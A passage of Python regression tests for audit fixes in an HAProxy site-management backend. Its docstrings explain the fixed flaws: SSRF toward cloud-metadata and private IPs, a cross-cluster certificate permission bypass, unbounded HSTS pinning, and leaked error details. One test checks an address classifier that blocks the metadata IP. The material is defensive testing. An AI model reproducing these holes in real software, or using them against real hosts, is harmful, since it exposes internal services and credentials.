R18b-#10 (SSRF guard): ACME diagnostics check_port80 issued an
outbound HTTP HEAD against operator-supplied domains. If the
domain resolved to private/loopback/link-local/cloud-metadata
IP space, the API host became a request-forwarding primitive.
Pre-fix any authenticated operator could fingerprint internal
services or hit AWS/GCP metadata IPs. Now we check `ipaddress`
classification before issuing the HTTP request and skip non-
public IPs with a "warn" target row.
R18b-#11 (Cert RBAC bypass): `select_existing_cert` only checked
`is_active=TRUE`. Pre-fix an operator with cluster-B access
could reference a cluster-A-only cert id; the helper would
silently bind the cert to cluster B via `ensure_cluster_junction`,
granting visibility the listing endpoint forbids. The helper
now mirrors the listing eligibility rule: the cert must be
global (no cluster junction rows) OR already bound to the
target cluster.
R18b-#11.1 (Server CA bundle scoping): per-server `ssl_certificate_id`
(HAProxy `ca-file` for upstream verification) had NO cluster
eligibility check pre-fix — only DB FK integrity. A new helper
`validate_server_ca_bundle_eligibility` is now called inside the
wizard transaction.
R18b-#12 (FK violation → 409): cert/cluster/backend deleted mid-
create produced a generic 500 from the create endpoint.
`ForeignKeyViolationError` now maps to 409 with a "retry with
fresh state" hint.
R18b-#13 (HSTS max_age cap): `hsts_max_age` accepted unbounded
ints. An operator could emit `Strict-Transport-Security:
max-age=10**18` and pin the host to HTTPS forever in every
browser that observed the response. Now capped at 2 years
(63072000s), matching the HSTS preload list maximum.
"""
import re
from pathlib import Path
import pytest
from pydantic import ValidationError
_REPO = Path(__file__).resolve().parent.parent
_FRONT = _REPO.parent / "frontend" / "src"
# ----------------- R18b-#10: SSRF guard -----------------
def test_acme_diagnostics_imports_ipaddress():
src = (_REPO / "services" / "acme_diagnostics.py").read_text()
assert "import ipaddress" in src, (
"R18b-#10 regression: acme_diagnostics no longer imports "
"ipaddress for SSRF guard"
)
def test_acme_diagnostics_is_public_ip_helper_present():
"""The SSRF guard depends on `_is_public_ip` correctly classifying
each IP. Verify the helper returns False for the most common
private/metadata addresses and True for a public address."""
from services.acme_diagnostics import _is_public_ip
# Loopback
assert not _is_public_ip("127.0.0.1")
# RFC1918
assert not _is_public_ip("10.0.0.1")
assert not _is_public_ip("192.168.1.1")
assert not _is_public_ip("172.20.5.5")
# Link-local incl. AWS / GCP metadata IP
assert not _is_public_ip("169.254.169.254")
# IPv6 loopback / ULA / link-local
assert not _is_public_ip("::1")
assert not _is_public_ip("fc00::1")
# R18b audit fix (round 7 hardening): IPv6 link-local fe80::/10
# falls under is_link_local in the stdlib; explicit coverage
# because Python's classification is the only line of defence.
assert not _is_public_ip("fe80::1")
assert not _is_public_ip("fe80::dead:beef")
# Multicast
assert not _is_public_ip("224.0.0.1")
# Public addresses
assert _is_public_ip("8.8.8.8")
assert _is_public_ip("1.1.1.1")
assert _is_public_ip("2606:4700:4700::1111")
# Garbage
assert not _is_public_ip("not-an-ip")
assert not _is_public_ip("")
assert not _is_public_ip(None) # type: ignore[arg-type]
def test_acme_diagnostics_check_port80_calls_ssrf_guard():
src = (_REPO / "services" / "acme_diagnostics.py").read_text()
# The guard helper must be invoked before session.head.
assert "_all_ips_public" in src, (
"R18b-#10 regression: check_port80 no longer references the "
"SSRF guard helper"
)
# Non-public IPs must be marked skipped/warned and continue (no probe).
assert "non-public IP" in src, (
"R18b-#10 regression: check_port80 no longer emits a non-public "
"IP skip row"
)
# ----------------- R18b-#11: select_existing_cert eligibility -----------------
def test_select_existing_cert_filters_by_cluster_eligibility():
src = (_REPO / "services" / "ssl_service.py").read_text()
# The query must reference ssl_certificate_clusters with the
# "global OR already bound" predicate.
assert "NOT EXISTS" in src and "ssl_certificate_clusters" in src, (
"R18b-#11 regression: select_existing_cert no longer filters "
"by cluster eligibility — cross-tenant cert binding is open"
)
# The naive pre-R18b query must be gone.
naive = re.compile(
r"SELECT id FROM ssl_certificates WHERE id\s*=\s*\$1\s+AND\s+is_active\s*=\s*TRUE\b",
re.IGNORECASE,
)
assert not naive.search(src), (
"R18b-#11 regression: select_existing_cert still uses the "
"naive id+is_active query that bypasses cluster scoping"
)
def test_validate_server_ca_bundle_eligibility_helper_exists():
src = (_REPO / "services" / "ssl_service.py").read_text()
assert "async def validate_server_ca_bundle_eligibility" in src, (
"R18b-#11.1 regression: per-server CA-bundle eligibility "
"validator is missing from ssl_service"
)
# And it must use the same eligibility predicate.
assert (
"ssl_certificate_clusters" in src
and "NOT EXISTS" in src
), (
"R18b-#11.1 regression: validate_server_ca_bundle_eligibility "
"no longer enforces the cluster eligibility predicate"
)
def test_site_wizard_router_calls_server_ca_bundle_validator():
src = (_REPO / "routers" / "site_wizard.py").read_text()
assert "validate_server_ca_bundle_eligibility" in src, (
"R18b-#11.1 regression: wizard router no longer calls the "
"per-server CA-bundle eligibility validator"
)
# And the failure path must be a 400, not silent acceptance.
assert (
"is not visible to cluster" in src
), (
"R18b-#11.1 regression: server CA-bundle eligibility failure "
"no longer surfaces a clear error to the operator"
)
# ----------------- R18b-#12: FK violation → 409 -----------------
def test_site_wizard_create_imports_fk_violation():
src = (_REPO / "routers" / "site_wizard.py").read_text()
assert "ForeignKeyViolationError" in src, (
"R18b-#12 regression: proxied_host router no longer imports "
"ForeignKeyViolationError"
)
assert "except ForeignKeyViolationError" in src, (
"R18b-#12 regression: create endpoint no longer catches FK "
"violations — they bubble to a generic 500"
)
catch_block = src[src.find("except ForeignKeyViolationError"):]
catch_block = catch_block[:catch_block.find("except UniqueViolationError")]
assert "status_code=409" in catch_block, (
"R18b-#12 regression: FK violation handler no longer raises 409"
)
# ----------------- R18b-#13: hsts_max_age cap -----------------
def test_hsts_max_age_capped_at_two_years():
from models.site_wizard import SSLChoice
# Default OK
SSLChoice(mode="none", hsts_enabled=True, hsts_max_age=31536000)
# 2 year cap is the boundary
SSLChoice(mode="none", hsts_enabled=True, hsts_max_age=63072000)
# Above the cap must reject
with pytest.raises(ValidationError):
SSLChoice(mode="none", hsts_enabled=True, hsts_max_age=63072001)
with pytest.raises(ValidationError):
SSLChoice(mode="none", hsts_enabled=True, hsts_max_age=10**18)
# Negative still rejected by ge=0
with pytest.raises(ValidationError):
SSLChoice(mode="none", hsts_enabled=True, hsts_max_age=-1)
@@ -0,0 +1,116 @@
"""v1.5.0 R18b round 5 audit fixes — operator-experience tests.
Findings discovered during R18b round 5 (least-explored angles):
R18b-#14 (Migration lag → 503): if the API process is brought up
against a database where `run_all_migrations` has not finished,
the new SSL eligibility query touches `ssl_certificate_clusters`
which may not exist yet and the wizard surfaced a generic 500.
Now mapped to 503 with a clear "run migrations" hint.
R18b-#15 (HSTS preload sanity): the wizard accepted nonsensical
HSTS combinations: `hsts_preload=true` with `hsts_enabled=false`
(no header is emitted, but operator sees "preload on"); preload
with `max_age < 1 year` (preload list rejects); preload without
`include_subdomains` (preload list rejects). Now Pydantic
rejects all three at validation time with a clear message.
"""
import pytest
from pydantic import ValidationError
# ----------------- R18b-#14: UndefinedTableError → 503 -----------------
def test_site_wizard_create_imports_undefined_table_error():
from pathlib import Path
src = (Path(__file__).resolve().parent.parent / "routers" / "site_wizard.py").read_text()
assert "UndefinedTableError" in src, (
"R18b-#14 regression: proxied_host router no longer imports "
"UndefinedTableError — migration lag will surface as a "
"generic 500 with raw asyncpg text"
)
assert "except UndefinedTableError" in src, (
"R18b-#14 regression: create endpoint no longer catches "
"UndefinedTableError"
)
catch_block = src[src.find("except UndefinedTableError"):]
catch_block = catch_block[:catch_block.find("except ForeignKeyViolationError")]
assert "status_code=503" in catch_block, (
"R18b-#14 regression: UndefinedTableError handler no longer "
"raises HTTP 503 (service unavailable until migrations apply)"
)
assert "migrations" in catch_block.lower(), (
"R18b-#14 regression: 503 detail no longer mentions migrations "
"— operator has no actionable guidance"
)
# ----------------- R18b-#15: HSTS preload sanity -----------------
def test_hsts_preload_requires_enabled():
from models.site_wizard import SSLChoice
# baseline: enabled is the only constraint that lets preload pass
SSLChoice(
mode="none",
hsts_enabled=True,
hsts_preload=True,
hsts_include_subdomains=True,
hsts_max_age=31536000,
)
# preload without enabled — must reject
with pytest.raises(ValidationError) as exc:
SSLChoice(
mode="none",
hsts_enabled=False,
hsts_preload=True,
hsts_include_subdomains=True,
hsts_max_age=31536000,
)
assert "hsts_enabled=true" in str(exc.value)
def test_hsts_preload_requires_one_year_max_age():
from models.site_wizard import SSLChoice
# one year - 1s — must reject
with pytest.raises(ValidationError) as exc:
SSLChoice(
mode="none",
hsts_enabled=True,
hsts_preload=True,
hsts_include_subdomains=True,
hsts_max_age=31535999,
)
assert "31536000" in str(exc.value) or "1 year" in str(exc.value)
# zero with preload — must reject
with pytest.raises(ValidationError):
SSLChoice(
mode="none",
hsts_enabled=True,
hsts_preload=True,
hsts_include_subdomains=True,
hsts_max_age=0,
)
def test_hsts_preload_requires_include_subdomains():
from models.site_wizard import SSLChoice
with pytest.raises(ValidationError) as exc:
SSLChoice(
mode="none",
hsts_enabled=True,
hsts_preload=True,
hsts_include_subdomains=False,
hsts_max_age=31536000,
)
assert "include_subdomains" in str(exc.value).lower()
def test_hsts_disabled_with_preload_off_still_works():
"""Backwards compat: legacy default values must continue to validate."""
from models.site_wizard import SSLChoice
SSLChoice(mode="none") # all defaults
SSLChoice(mode="none", hsts_enabled=False, hsts_preload=False)
# operator sets long max_age but keeps preload off — fine
SSLChoice(mode="none", hsts_enabled=True, hsts_max_age=31536000, hsts_preload=False)
@@ -0,0 +1,114 @@
"""v1.5.0 R18b round 6 audit fixes — convergence regression tests.
Findings discovered during R18b round 6:
R18b-#16 (DELETE drafts idempotency): the DELETE /drafts/{id}
endpoint relied on `result.endswith("0")` to decide whether to
return 404. That is fragile under asyncpg upgrades (the status
string format is undocumented stable surface). Replaced with
`DELETE ... RETURNING id` + explicit None check.
R18b-#17 (Wizard audit-trail fidelity): the activity-logger
middleware only records 2xx HTTP responses with the bare status
code. The wizard create endpoint can return HTTP 200 while the
body's `status` field is `created_pending_apply_failed` or
`applied_acme_staging_failed` — the audit trail claimed "wizard
succeeded" while downstream apply or ACME staging actually
failed. Now the wizard explicitly emits a `user_activity_logs`
row capturing the wizard outcome so the audit trail reflects
reality regardless of HTTP status interpretation.
"""
from pathlib import Path
import pytest
_REPO = Path(__file__).resolve().parent.parent
# ----------------- R18b-#16: DELETE drafts RETURNING -----------------
def test_drafts_delete_uses_returning_for_idempotency():
src = (_REPO / "routers" / "site_wizard.py").read_text()
# Locate the DELETE endpoint body.
delete_marker = '@router.delete("/drafts/{draft_id}")'
assert delete_marker in src, "draft DELETE endpoint missing"
body = src[src.find(delete_marker):]
# Just inspect the next ~80 lines of code.
body = body[: body.find("@router", 1) if body.find("@router", 1) > 0 else 4000]
assert "RETURNING id" in body, (
"R18b-#16 regression: drafts DELETE no longer uses RETURNING "
"to detect 0-rows-affected — relies on fragile string parsing"
)
assert "deleted_id is None" in body, (
"R18b-#16 regression: drafts DELETE no longer guards against "
"the 0-rows case via explicit None check"
)
# The pre-R18b fragile pattern must be gone — but allow it in
# comments (the R18b fix comment intentionally cites the legacy
# pattern as documentation). Strip line comments before the
# check.
code_only = "\n".join(
ln for ln in body.splitlines() if not ln.lstrip().startswith("#")
)
assert 'result.endswith("0")' not in code_only, (
"R18b-#16 regression: drafts DELETE still parses the asyncpg "
"status string via `result.endswith(\"0\")` — this breaks "
"silently if asyncpg ever changes the status format"
)
# ----------------- R18b-#17: Wizard audit-trail fidelity -----------------
def test_wizard_create_logs_outcome_to_user_activity_logs():
src = (_REPO / "routers" / "site_wizard.py").read_text()
# The wizard create response builder must emit log_user_activity.
assert "log_user_activity" in src or "_log_user_activity" in src, (
"R18b-#17 regression: wizard create endpoint no longer emits "
"an explicit user_activity_logs row — middleware-only logging "
"misses degraded 200-status outcomes"
)
assert 'action="wizard_create_site"' in src, (
"R18b-#17 regression: wizard activity-log action name missing "
"or not migrated to the post-Phase-D `wizard_create_site` value"
)
# The details dict must include enough context to reconstruct
# what actually happened on a degraded outcome.
detail_keys = [
'"wizard_status"',
'"cluster_id"',
'"ssl_mode"',
'"acme_staging_error"',
'"apply_error"',
]
for k in detail_keys:
assert k in src, (
f"R18b-#17 regression: wizard activity-log details no "
f"longer include {k} — auditor cannot reconstruct degraded "
"outcomes"
)
def test_wizard_audit_log_failure_does_not_break_response():
"""The audit-log emit path is wrapped in try/except so a logging
failure never breaks the main wizard response."""
src = (_REPO / "routers" / "site_wizard.py").read_text()
# The block must include a try around the log_user_activity call.
audit_block = src[src.find("R18b audit fix (round 6 #15)"):]
assert "try:" in audit_block[:1500], (
"R18b-#17 regression: wizard audit-log emit no longer wrapped "
"in try/except — a logging failure can now break the response"
)
assert "except Exception" in audit_block[:2500], (
"R18b-#17 regression: wizard audit-log emit no longer guards "
"all exception types"
)
# And the failure handler must not re-raise.
handler = audit_block[audit_block.find("except Exception"):][:200]
assert "raise" not in handler, (
"R18b-#17 regression: wizard audit-log handler now re-raises "
"— a logging failure can break the wizard response"
)
@@ -0,0 +1,88 @@
"""v1.5.0 R18b round 7 audit fixes — final convergence polish.
Findings discovered during R18b round 7 (final convergence):
R18b-#18 (check_port80 rollup branching): when every probe target
was skipped because the SSRF guard refused to probe a non-
public IP, the rollup message read "Egress to port 80 appears
blocked" — operators chased corporate firewall logs while the
real cause was an internal-only DNS A record. Now the rollup
branches on whether skips were SSRF or egress, and a default
is provided so the message never reads "(None)".
R18b-#19 (Audit log fire-and-forget): the wizard create endpoint
awaited the `log_user_activity` call before returning. The
secondary INSERT added wizard tail-latency. The activity-log
helper already swallows its own exceptions and never raises;
spawning the call as a fire-and-forget task lets the wizard
return as soon as the main transaction is committed.
"""
import asyncio
import socket
from pathlib import Path
import pytest
from services.acme_diagnostics import _is_public_ip, check_port80
_REPO = Path(__file__).resolve().parent.parent
# ----------------- R18b-#18: rollup message branching -----------------
@pytest.mark.asyncio
async def test_check_port80_rollup_says_ssrf_skip_not_egress(monkeypatch):
"""When every target is SSRF-skipped, rollup must NOT say
'egress blocked'."""
def fake_gethostbyname_ex(domain):
return (domain, [], ["10.0.0.1"])
monkeypatch.setattr(socket, "gethostbyname_ex", fake_gethostbyname_ex)
out = await check_port80(["a.example.com", "b.example.com"])
assert out["status"] == "warn"
msg = out["message"].lower()
assert "non-public" in msg, (
f"R18b-#18 regression: SSRF-skip rollup no longer mentions "
f"non-public IP. Got: {out['message']!r}"
)
assert "egress" not in msg, (
f"R18b-#18 regression: SSRF-skip rollup still says 'egress' — "
f"misleads operators chasing firewall logs. Got: {out['message']!r}"
)
@pytest.mark.asyncio
async def test_check_port80_rollup_message_no_none_default(monkeypatch):
"""The skip_reason fallback string must never let the message
read '(None)' — pre-fix that happened when no IPs resolved."""
def fake_gethostbyname_ex(domain):
# Empty IP list — _all_ips_public returns (False, [])
return (domain, [], [])
monkeypatch.setattr(socket, "gethostbyname_ex", fake_gethostbyname_ex)
out = await check_port80(["a.example.com"])
assert "(None)" not in out["message"], (
f"R18b-#18 regression: rollup message contains '(None)' — "
f"got: {out['message']!r}"
)
# ----------------- R18b-#19: audit log fire-and-forget -----------------
def test_wizard_audit_log_emit_is_fire_and_forget():
src = (_REPO / "routers" / "site_wizard.py").read_text()
# Locate the audit-log emit block.
audit_block = src[src.find("R18b audit fix (round 6 #15)"):]
audit_block = audit_block[: audit_block.find("return {")]
# Must use create_task (fire-and-forget), not bare await.
assert "create_task" in audit_block, (
"R18b-#19 regression: wizard audit-log emit no longer uses "
"asyncio.create_task — adds tail latency to wizard response"
)
# The bare `await _log_user_activity(` pattern must be gone from
# the audit block.
assert "await _log_user_activity(" not in audit_block, (
"R18b-#19 regression: wizard audit-log emit still awaits the "
"log helper — the secondary INSERT adds tail latency"
)
@@ -0,0 +1,169 @@
"""v1.5.0 R18c round 1 audit fixes — peripheral impact tests.
Findings discovered during R18c round 1 (peripheral impact of
R18 + R18b changes):
R18c-#1 (KRITIK — uncommitted-data invisibility): the wizard CREATE
endpoint and the ACME post-completion path generated a fresh
HAProxy config snapshot via
`generate_haproxy_config_for_cluster(cluster_id)` — without
passing the active transaction connection. Under PostgreSQL READ
COMMITTED, a SECOND pooled connection cannot see the uncommitted
INSERTs that just created the wizard's backend / servers /
frontend rows in the same transaction. Result: the
config_versions snapshot SILENTLY OMITTED the wizard-created
entities and the operator's apply re-deployed a config without
the new site even though the API said "created successfully".
Now both call sites pass `conn` so the snapshot reflects the
uncommitted state.
R18c-#2 (Migration safety — UndefinedColumnError): rolling
deploys can hit the wizard endpoint while migrations are still
catching up to add new columns (e.g. backend_servers
`ssl_certificate_id`). Pre-fix that surfaced as 500 with raw
asyncpg error text. Now mapped to 503 with the same "run
migrations" hint as the missing-table case.
R18c-#3 (Bulk rollback iteration order): rejecting a wizard
PENDING walked `bulk_snapshots` forward (backend → servers →
ssl_certificate → HTTP frontend → HTTPS frontend). With strict
FK schemas (frontends.ssl_certificate_id REFERENCES
ssl_certificates.id) the cert delete fired BEFORE the
referencing frontend was deleted, hitting an FK violation and
aborting the rollback half-way. Now iteration is reversed —
children before parents.
R18c-#4 (Duplicate audit log): the wizard CREATE endpoint emits
its own `wizard_create_proxied_host` row from the router. The
SPECIAL_ACTIONS map ALSO entered `proxied_host_created` for the
same endpoint, so every successful wizard create produced TWO
user_activity_logs rows. Removed the SPECIAL_ACTIONS entry AND
short-circuited the middleware for POST /api/proxied-hosts so
no fallback path can re-introduce the duplicate.
"""
from pathlib import Path
import pytest
_REPO = Path(__file__).resolve().parent.parent
# ----------------- R18c-#1: uncommitted data visibility -----------------
def test_wizard_create_passes_conn_to_config_generator():
src = (_REPO / "routers" / "site_wizard.py").read_text()
# The wizard's config-gen call must pass the transaction conn.
assert "generate_haproxy_config_for_cluster(body.cluster_id, conn)" in src, (
"R18c-#1 KRITIK regression: wizard CREATE no longer passes "
"the transaction connection into config generation. Without "
"it, the config_versions snapshot OMITS the wizard's "
"uncommitted INSERTs and the operator's subsequent apply "
"deploys a config without the new site."
)
# The pre-fix bare-form call must be gone.
assert "generate_haproxy_config_for_cluster(body.cluster_id)" not in src.replace(
"generate_haproxy_config_for_cluster(body.cluster_id, conn)", ""
), (
"R18c-#1 KRITIK regression: a bare "
"`generate_haproxy_config_for_cluster(body.cluster_id)` call "
"is back in the wizard CREATE flow"
)
def test_acme_post_completion_passes_conn_to_config_generator():
src = (_REPO / "routers" / "letsencrypt.py").read_text()
# The ACME post-completion HTTPS frontend creation must also
# pass the transaction conn.
assert "generate_haproxy_config_for_cluster(cluster_id, conn)" in src, (
"R18c-#1 KRITIK regression: ACME post-completion no longer "
"passes the transaction connection — the freshly-created "
"HTTPS frontend is silently omitted from the post-completion "
"config_versions snapshot, so the cert never goes live until "
"the next manual config consolidation."
)
# ----------------- R18c-#2: UndefinedColumnError → 503 -----------------
def test_wizard_create_imports_undefined_column_error():
src = (_REPO / "routers" / "site_wizard.py").read_text()
assert "UndefinedColumnError" in src, (
"R18c-#2 regression: wizard router no longer imports "
"UndefinedColumnError — migration lag (missing column) "
"surfaces as a generic 500 with raw asyncpg text"
)
assert "except UndefinedColumnError" in src, (
"R18c-#2 regression: create endpoint no longer catches "
"UndefinedColumnError"
)
catch_block = src[src.find("except UndefinedColumnError"):]
catch_block = catch_block[:catch_block.find("except UndefinedTableError")]
assert "status_code=503" in catch_block, (
"R18c-#2 regression: UndefinedColumnError handler no longer "
"raises 503"
)
assert "migrations" in catch_block.lower(), (
"R18c-#2 regression: 503 detail no longer mentions migrations"
)
# ----------------- R18c-#3: rollback reverse order -----------------
def test_bulk_rollback_walks_snapshots_in_reverse():
src = (_REPO / "routers" / "cluster.py").read_text()
# The reverse-order iteration must be present.
assert "reversed(bulk_snapshots)" in src, (
"R18c-#3 regression: bulk_snapshots rollback no longer walks "
"in reverse — strict FK schemas will FK-violate when the "
"ssl_certificate snapshot tries to DELETE before the "
"referencing frontend is deleted, leaving a half-rolled-back "
"cluster"
)
# ----------------- R18c-#4: duplicate audit log -----------------
def test_special_actions_no_longer_entries_proxied_host_create():
src = (_REPO / "middleware" / "activity_logger.py").read_text()
# The bare `/api/proxied-hosts` SPECIAL_ACTIONS entry must be gone.
assert "'/api/proxied-hosts': 'proxied_host_created'" not in src, (
"R18c-#4 regression: SPECIAL_ACTIONS still maps "
"POST /api/proxied-hosts → 'proxied_host_created' — the "
"wizard now emits its own richer audit row, so this entry "
"produces a duplicate user_activity_logs row per create"
)
# The non-create wizard endpoints must still be logged.
for kept in (
"'/api/proxied-hosts/preview'",
"'/api/proxied-hosts/preflight-acme'",
"'/api/proxied-hosts/drafts'",
"'/api/proxied-hosts/drafts/{draft_id}'",
):
assert kept in src, (
f"R18c-#4 regression: {kept} dropped from SPECIAL_ACTIONS — "
"preview / preflight / draft endpoints will no longer be "
"audited"
)
def test_middleware_short_circuits_proxied_hosts_post():
src = (_REPO / "middleware" / "activity_logger.py").read_text()
# The middleware fast-path must skip POST /api/sites (current
# canonical) AND POST /api/proxied-hosts (legacy 308 alias) so
# neither path produces a duplicate audit row.
assert "'/api/sites'" in src and "'/api/proxied-hosts'" in src, (
"R18c-#4 regression: middleware short-circuit no longer "
"covers BOTH the canonical /api/sites slug and the legacy "
"/api/proxied-hosts alias — Phase B/D rename has dropped "
"one of them"
)
assert "request.method == 'POST'" in src, (
"R18c-#4 regression: middleware no longer short-circuits the "
"wizard create POST — the standard CRUD fallback can still "
"produce a duplicate audit row"
)
@@ -0,0 +1,347 @@
"""
R18c round 10 — Wizard / Drafts / ACME deep-dive audit fixes
=============================================================
This round's findings come from three parallel deep-dive audits
(Wizard+Drafts, ACME Diagnostic Panel, Cross-cutting / Architecture)
run against the entire delta from commit 89cbe3d (initial v1.5.0 ship)
through 75cd18e. Per the user's directive ("risksiz ve kompleks
değişiklikler yapma. Enterprise ilerlediğimizi unutma") only the
CRITICAL bug and a curated set of low-risk MEDIUM findings are fixed
here. The HIGH multi-tenant inventory-GET hardening is deferred to
a separate round because it requires a real cluster-scoped filter
contract that may break legacy clients.
Fixes locked in by this test file:
CRITICAL — RBAC plural mismatch
Wizard checked ("backend"|"frontend"|"ssl", action) for both
`_can_use_wizard` and the create endpoint. Seeded role
permissions in database/migrations.py use PLURAL names
(frontends.create, backends.create, ssl.create). Result: every
non-admin role evaluated False on `_can_use_wizard` and 403'd
on create — the R18c-#7 admin bypass was the only thing keeping
the feature operable. Aligned the keys.
M1 — Wizard offered TLSv1.0 / TLSv1.1 in server-side TLS dropdowns
even though ServerStep.reject_server_ca_bundle_without_ssl
rejects them per RFC 8996. Removed the legacy options from
the UI to keep the contract symmetric.
M2 — Resume hydration jumped to Review & Apply before the cluster-
scoped existing-cert list finished loading. A fast Submit
click could race the orphan-cleanup pass and submit a stale
ssl_certificate_id (FK 400). New `existingCertsLoading`
state guards the Submit / Save buttons while the fetch is
in flight AND ssl.mode == 'existing'.
M3 — `create_proxied_host` 500 catch-all returned `detail=str(e)`
to the browser, leaking SQL fragments and internal
identifiers. Replaced with a stable generic message + a
correlation id surfaced in the operator's toast and logged
server-side at exception level.
M4 — handleCancel's Modal.confirm allowed Esc / mask click to
trigger the Save Draft path silently. Disabled both
dismissal vectors (`keyboard: false`, `maskClosable: false`)
so the operator must make an explicit choice.
M5 — fetchInitial swallowed every error; an outage on
/api/clusters or /api/letsencrypt/accounts left the wizard
with empty dropdowns indistinguishable from "no clusters
provisioned". Replaced silent catch with per-call
extractApiError + `message.warning` (clusters required) /
`message.info` (LE accounts optional for non-ACME flows).
M8 — Review step coerced apply_immediately=true from inside a
Form.Item shouldUpdate render function via setTimeout(0).
That is a setState-during-render anti-pattern; React 18
Strict Mode double-renders it. Moved the coercion to a
useEffect keyed on the existing sslMode useWatch.
Test layout follows R18c round 9: _BACK is the directory containing
routers/ (works for both dev checkout and the backend-only Docker
test image), and frontend assertions skip when frontend/src is not
mounted into the image.
"""
from __future__ import annotations
from pathlib import Path
import pytest
_BACK = Path(__file__).resolve().parent.parent
_FRONT = _BACK.parent / "frontend" / "src"
_FRONTEND_AVAILABLE = _FRONT.exists()
# =====================================================================
# CRITICAL — RBAC plural keys
# =====================================================================
def test_can_use_wizard_uses_plural_resource_names():
"""`_can_use_wizard` must check the PLURAL resource keys
(frontends.*, backends.*, ssl.*) that match seeded role
permissions in database/migrations.py. Pre-round-10 it checked
SINGULAR (frontend.*, backend.*, ssl.*) and never matched any
non-admin role's permissions JSONB."""
src = (_BACK / "routers" / "site_wizard.py").read_text()
# Walk forward from the tuple opening through balanced parens so
# nested ("frontends", "read") tuples don't end the block early.
start = src.find("candidate_perms = (")
assert start >= 0, "could not locate candidate_perms tuple"
open_at = src.find("(", start)
depth = 0
end = -1
for i in range(open_at, len(src)):
ch = src[i]
if ch == "(":
depth += 1
elif ch == ")":
depth -= 1
if depth == 0:
end = i
break
assert end >= 0, "could not find balanced closing paren for candidate_perms"
block = src[start:end + 1]
assert '("frontends", "read")' in block
assert '("frontends", "create")' in block
assert '("backends", "create")' in block
assert '("backends", "read")' in block
assert '("ssl", "read")' in block
assert '("ssl", "create")' in block
# And the broken singular forms are GONE inside the tuple itself.
assert '("frontend", "read")' not in block, (
"R18c-#32 regression: _can_use_wizard must not check singular "
"'frontend' (use 'frontends' to match seeded permissions)"
)
assert '("frontend", "create")' not in block
assert '("backend", "create")' not in block
assert '("backend", "read")' not in block
def test_create_site_uses_plural_resource_names():
"""The composite RBAC loop in `create_proxied_host` must check
backends.create + frontends.create + ssl.create. Pre-round-10
it checked the singular form which only ever passed for admins
via the round-7 bypass."""
src = (_BACK / "routers" / "site_wizard.py").read_text()
needle = (
'for resource, action in (("backends", "create"), '
'("frontends", "create"), ("ssl", "create"))'
)
assert needle in src, (
"R18c-#32 regression: create_proxied_host must enumerate the "
"composite RBAC tuple with PLURAL resource names"
)
bad = (
'for resource, action in (("backend", "create"), '
'("frontend", "create"), ("ssl", "create"))'
)
assert bad not in src, (
"Stale singular RBAC tuple still present — non-admins blocked"
)
# =====================================================================
# M1 — TLS 1.0/1.1 not offered in server-side TLS dropdowns
# =====================================================================
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_site_wizard_drops_tls10_tls11_from_server_dropdowns():
"""The wizard's server-side TLS min/max selects must not list
TLSv1.0 / TLSv1.1 since ServerStep.reject_server_ca_bundle_without_ssl
rejects those values at the API boundary."""
src = (_FRONT / "components" / "SiteWizard.js").read_text()
# Locate the server TLS dropdowns inside the servers Form.List.
# Inside the "TLS min" / "TLS max" Form.Items there must be only
# TLSv1.2 and TLSv1.3 Option lines.
assert 'name={[name, \'ssl_min_ver\']}' in src, (
"server-side ssl_min_ver Form.Item missing — refactor break"
)
# Quick neighborhood scan: between the TLS min Form.Item and the
# TLS max Form.Item there must be NO TLSv1.0/TLSv1.1 string.
min_anchor = src.find("name={[name, 'ssl_min_ver']}")
max_anchor = src.find("name={[name, 'ssl_max_ver']}", min_anchor + 1)
end_max = src.find("</Select>", max_anchor)
assert end_max > 0
snippet = src[min_anchor:end_max]
assert "TLSv1.0" not in snippet, (
"R18c-#33 regression: TLSv1.0 still offered in server TLS UI"
)
assert "TLSv1.1" not in snippet, (
"R18c-#33 regression: TLSv1.1 still offered in server TLS UI"
)
assert "TLSv1.2" in snippet
assert "TLSv1.3" in snippet
# =====================================================================
# M2 — Resume hydration race (cert reconciliation guard)
# =====================================================================
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_site_wizard_tracks_existing_certs_loading_state():
src = (_FRONT / "components" / "SiteWizard.js").read_text()
assert "const [existingCertsLoading, setExistingCertsLoading]" in src, (
"R18c-#34 regression: SiteWizard must track existing-cert "
"fetch state (existingCertsLoading) to guard Submit during "
"resume race"
)
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_site_wizard_disables_submit_while_cert_reconciliation_pending():
"""The unified submit button must be disabled while sslMode ==
'existing' and the cluster-scoped cert list is still loading.
Phase K Phase D (Bulgu #6) — Updated for the post-unification
UI: the old 'Create as PENDING' button was retired; only the
'Create Site' / 'Create & Apply (ACME)' button remains. The
`acmeBlocksDraft` flag was retired too — handleSubmit derives
apply_immediately from sslMode internally. The cert-race guard
still applies to the surviving button.
"""
src = (_FRONT / "components" / "SiteWizard.js").read_text()
assert "certReconciliationPending" in src, (
"R18c-#34 regression: SiteWizard must define a guard variable "
"(certReconciliationPending) to express the resume-race state"
)
# Phase K Phase D: only one submit button now — pin the cert-race
# guard on that button's disabled clause.
assert "acmeBlocksSubmit || certReconciliationPending" in src, (
"Create button missing certReconciliationPending guard "
"(Phase K Phase D unified the two pre-existing submit buttons "
"into one; the cert-race guard moved onto the survivor)."
)
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_site_wizard_existing_cert_fetch_toggles_loading_flag():
"""The cluster-scoped /api/ssl/certificates fetch effect must
set the loading flag at fetch start AND clear it in finally so
a network failure does not leave the Submit button disabled."""
src = (_FRONT / "components" / "SiteWizard.js").read_text()
assert "setExistingCertsLoading(true);" in src, (
"fetch effect must set loading=true before issuing the GET"
)
assert "setExistingCertsLoading(false);" in src, (
"fetch effect must always clear loading (use finally branch)"
)
# =====================================================================
# M3 — 500 detail leakage replaced with correlation id
# =====================================================================
def test_create_site_500_does_not_leak_exception_str():
src = (_BACK / "routers" / "site_wizard.py").read_text()
# The new error-handling block uses a uuid4-derived correlation id
# and a stable user-facing message. The stale `detail=str(e)` form
# must be gone.
assert "raise HTTPException(status_code=500, detail=str(e))" not in src, (
"R18c-#35 regression: 500 catch-all leaks str(e) to client"
)
assert "correlation_id = uuid.uuid4().hex" in src, (
"R18c-#35 regression: 500 path must mint a correlation id"
)
assert "Wizard create failed unexpectedly" in src, (
"R18c-#35 regression: 500 detail must be a stable generic message"
)
assert 'correlation_id=' in src, (
"R18c-#35 regression: server log must include correlation_id label"
)
